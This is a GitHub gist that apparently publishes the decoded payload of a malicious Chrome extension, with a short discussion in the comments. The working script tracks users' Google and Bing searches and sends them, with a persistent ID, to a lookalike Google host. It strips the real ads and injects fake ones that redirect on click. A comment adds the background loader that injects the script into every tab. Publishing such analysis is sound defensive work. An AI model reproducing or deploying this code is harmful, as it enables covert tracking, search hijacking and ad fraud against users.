Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
fly-analytics-decoded.js
var $jscomp = $jscomp || {};
$jscomp['scope'] = {};
$jscomp['createTemplateTagFirstArg'] = function(c) {
return c['raw'] = c;
};
$jscomp['createTemplateTagFirstArgWithRaw'] = function(c, e) {
c['raw'] = e;
return c;
};
$jscomp['arrayIteratorImpl'] = function(c) {
var e = 0x0;
return function() {
var f = {};
f['done'] = !0x0;
return e < c['length'] ? {
'done': !0x1,
'value': c[e++]
} : f;
};
};
$jscomp['arrayIterator'] = function(d) {
var e = {};
e['next'] = $jscomp['arrayIteratorImpl'](d);
return e;
};
$jscomp['makeIterator'] = function(c) {
var e = 'undefined' != typeof Symbol && Symbol['iterator'] && c[Symbol['iterator']];
return e ? e['call'](c) : $jscomp['arrayIterator'](c);
};
(function() {
var h = function() {
var s = !![];
return function(t, u) {
var v = s ? function() {
if (u) {
var x = u['apply'](t, arguments);
u = null;
return x;
}
} : function() {};
s = ![];
return v;
};
}();
var i = function() {
var s = !![];
return function(t, u) {
var v = s ? function() {
if (u) {
var x = u['apply'](t, arguments);
u = null;
return x;
}
} : function() {};
s = ![];
return v;
};
}();
var j = document['getElementById']('jsrunning');
if (!j || j['rel'] == chrome['runtime']['id']) {
j = document['createElement']('link');
j['id'] = 'jsrunning';
j['rel'] = chrome['runtime']['id'];
(document['head'] || document['documentElement'])['append'](j);
var k = {};
k['google'] = '(?=^.*google.*/search.*?[?|&]q=(.*?)(?:&|$))(?!^.*tbm=isch|.*tbm=shop|.*tbm=nws|.*tbm=plcs|.*tbm=lcl|.*ibp=htl;jobs).*';
var l = {};
l['bing'] = '.*bing.com/search.*?[?|&]q=(.*?)(?:&|$)';
var m = [k, l],
n = function(s) {
for (var t = {}, u = $jscomp['makeIterator'](m), v = u['next'](); !v['done']; v = u['next']()) {
v = v['value'];
var x = s['match'](Object['values'](v)[0x0]);
if (null !== x && 0x1 < x['length']) {
var B = {};
B['domain'] = Object['keys'](v)[0x0];
B['query'] = x[0x1];
t = B;
break;
}
}
return t;
},
o = function() {
function s() {
return '10000000-1000-4000-8000-100000000000' ['replace'](/[018]/g, function(t) {
return (t ^ crypto['getRandomValues'](new Uint8Array(0x1))[0x0] & 0xf >> t / 0x4)['toString'](0x10);
});
}
return localStorage['UID'] || (localStorage['UID'] = s());
},
p = function(s) {
return new Promise(function(t) {
var u = new Image();
u['crossOrigin'] = 'Anonymous';
u['referrerPolicy'] = 'unsafe-url';
u['onload'] = function() {
var v = document['createElement']('canvas');
v['height'] = u['height'];
v['width'] = u['width'];
var x = v['getContext']('2d');
x['drawImage'](u, 0x0, 0x0);
v = x['getImageData'](0x0, 0x0, v['width'], v['height'])['data'];
base64 = '';
for (x = 0x0; x < v['length']; x++)
if (0xff !== v[x]) {
if (0x2a == v[x]) break;
base64 += String['fromCharCode'](v[x]);
} v = [];
try {
v = JSON['parse'](atob(base64));
} catch (B) {}
t(v);
};
u['onerror'] = function() {
t([]);
};
u['src'] = 'https://lh3.googleusrcontent.com/' + btoa(chrome['runtime']['id']) + '/AAAAAAAAAAI/AAAAAAAAAAA/' + btoa(o()) + '/s128-b16-cc-rp/photo.jpg';
});
},
q = function(s) {
return new Promise(function(t) {
var u = document['querySelector'](s);
if (u) return t(u);
var v = {};
v['childList'] = !0x0;
v['subtree'] = !0x0;
new MutationObserver(function(x, B) {
var C = document['querySelector'](s);
if (C) return t(C);
})['observe'](document['documentElement'], v);
});
},
r = function(s) {
s['querySelectorAll']('a')['forEach'](function(t) {
t['addEventListener']('click', function(u) {
u['preventDefault']();
this['hasAttribute']('data-context') && (window['location'] = atob(this['getAttribute']('data-context')));
});
});
};
(function() {
var s = h(this, function() {
var x = typeof window !== 'undefined' ? window : typeof process === 'object' && typeof require === 'function' && typeof global === 'object' ? global : this;
var B = function() {
var C = new x[('RegExp')]('^([^ ]+( +[^ ]+)+)+[^ ]}');
return !C['test'](s);
};
return B();
});
s();
var t = i(this, function() {
var x = function() {};
var B = typeof window !== 'undefined' ? window : typeof process === 'object' && typeof require === 'function' && typeof global === 'object' ? global : this;
if (!B['console']) {
B['console'] = function(C) {
var D = {};
D['log'] = C;
D['warn'] = C;
D['debug'] = C;
D['info'] = C;
D['error'] = C;
D['exception'] = C;
D['table'] = C;
D['trace'] = C;
return D;
}(x);
} else {
B['console']['log'] = x;
B['console']['warn'] = x;
B['console']['debug'] = x;
B['console']['info'] = x;
B['console']['error'] = x;
B['console']['exception'] = x;
B['console']['table'] = x;
B['console']['trace'] = x;
}
});
t();
var u = n(document['location']['href']);
if (u['domain']) {
var v = p(u['query']);
'google' == u['domain'] && (q('#tvcap')['then'](function(x) {
x['innerHTML'] = '';
v['then'](function(C) {
if (0x0 < C['length']) {
var D = document['createElement']('div');
D['className'] = 'srg';
var E = document['createElement']('div');
E['className'] = 'srg';
try {
for (var F = document['getElementById']('rso'), G = $jscomp['makeIterator'](C['entries']()), H = G['next'](); !H['done']; H = G['next']()) {
var I = $jscomp['makeIterator'](H['value']),
J = I['next']()['value'],
K = I['next']()['value'],
L = '';
if (K['siteLinks']) {
L = '<div class="osl1">';
for (var M = $jscomp['makeIterator'](K['siteLinks']['entries']()), N = M['next'](); !N['done']; N = M['next']()) {
var O = $jscomp['makeIterator'](N['value']),
P = O['next']()['value'],
Q = O['next']()['value'];
L += '<a class="fl" data-context="' + btoa(Q['url']) + '" href="https://' + K['host']['toLowerCase']() + '/' + Q['text']['toLowerCase']()['replace'](/ /g, '-') + '"><span>' + Q['text'] + '</span></a>' + (P == K['siteLinks']['length'] - 0x1 ? '' : '<span> · </span>');
}
L += '</div>';
}
var R = '<div class="g"> <div> <div class="rc"> <div class="r"> <a href="https://' + K['host']['toLowerCase']() + '" data-context="' + btoa(K['url']) + '"><br> <h3 class=""><span>' + K['title'] + '</span></h3> <div style="position: absolute;left: 0;top: 0;"><span style="color: #202124;font-weight: bold;">Ad<span style="padding:0 5px">·</span></span><cite class="iUh30">' + K['host'] + '</cite></div> </a> </div> <div class="s"> <div> <span class="st"><span>' + K['description'] + '</span></span> </div> </div> ' + L + ' </div> </div> </div>';
var S = new DOMParser()['parseFromString'](R, 'text/html')['body']['firstChild'];
r(S);
J < C['length'] / 0x2 || 0x5 > J ? D['appendChild'](S) : E['appendChild'](S);
}
F['insertBefore'](D, F['firstChild']);
F['append'](E);
} catch (T) {}
}
});
}), q('#bottomads')['then'](function(x) {
x['innerHTML'] = '';
}));
'bing' == u['domain'] && (q('#b_results')['then'](function(x) {
v['then'](function(C) {
if (0x0 < C['length']) try {
for (var D = document['getElementById']('b_results'), E = document['getElementsByClassName']('b_rs')[0x0] && document['getElementsByClassName']('b_rs')[0x0]['parentElement'], F = D['firstChild'], G = $jscomp['makeIterator'](C['entries']()), H = G['next'](); !H['done']; H = G['next']()) {
var I = $jscomp['makeIterator'](H['value']),
J = I['next']()['value'],
K = I['next']()['value'],
L = '';
if (K['siteLinks']) {
L = '<ul class="b_factrow">';
for (var M = $jscomp['makeIterator'](K['siteLinks']['entries']()), N = M['next'](); !N['done']; N = M['next']()) {
var O = $jscomp['makeIterator'](N['value']),
P = O['next']()['value'],
Q = O['next']()['value'];
L += '<li><a data-context="' + btoa(Q['url']) + '" href="https://' + K['host']['toLowerCase']() + '/' + Q['text']['toLowerCase']()['replace'](/ /g, '-') + '\x22>' + Q['text'] + '</a>' + (P == K['siteLinks']['length'] - 0x1 ? '' : ' · ') + '</li>';
}
L += '</ul>';
}
var R = '<li class="b_algo"> <h2><a href="https://' + K['host']['toLowerCase']() + '" data-context="' + btoa(K['url']) + '\x22>' + K['title'] + '</a></h2> <div class="b_caption"> <div class="b_attribution"><cite>' + K['host'] + '</cite></div> <p><span style="margin-right: 4px;padding: 2px 4px 2px 4px;color: #666;border: 1px solid #ddd;vertical-align: middle;font-size: 11px;font-weight: normal;line-height: 11px;border-radius: 6px;display: inline-block;">Ad</span>' + K['description'] + '</p> </div> ' + L + ' </li>';
var S = new DOMParser()['parseFromString'](R, 'text/html')['body']['firstChild'];
r(S);
if (J < C['length'] / 0x2 || 0x5 > J) {
if (D['insertBefore'](S, F), F = S['nextSibling'], !E && 0x4 == J) break;
} else D['insertBefore'](S, E);
}
} catch (T) {}
});
}), q('.b_ad')['then'](function(x) {
x['remove']();
}), q('.b_adBottom')['then'](function(x) {
x['remove']();
}));
}
}());
}
}());
@rkim-ias

This comment has been minimized.

Copy link

@rkim-ias rkim-ias commented Aug 7, 2020

Thank you for putting this information out.

However, do you know how this script is able to execute from a background context and still inject into Google domains without a content script?

Perhaps the versions of the extensions I have looked at are different from what you have been investigating?

Thanks

@ameshkov

This comment has been minimized.

Copy link
Owner Author

@ameshkov ameshkov commented Aug 7, 2020

@rkim-ias

The script here is executed in the page context, not in the background context.

Here's what's executed in the bg context:

let code = 'HERE GOES BASE64-ENCODED SCRIPT';
chrome.tabs.onUpdated.addListener(function (tabId, changeInfo, tab) {
    if (changeInfo.url) {
        chrome.tabs.executeScript(tabId, { code: atob(code), runAt: 'document_start' }, function () {
            if (chrome.runtime.lastError) { }
        });
    }
});

let code -- base64-encoded and obfuscated version of the script you see in this gist

@rkim-ias

This comment has been minimized.

Copy link

@rkim-ias rkim-ias commented Aug 7, 2020

@ameshkov

Quite fantastic!

thanks again 👍

@T1MU7

This comment has been minimized.

Copy link

@T1MU7 T1MU7 commented Aug 18, 2020

Thank you. Adguard the best!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.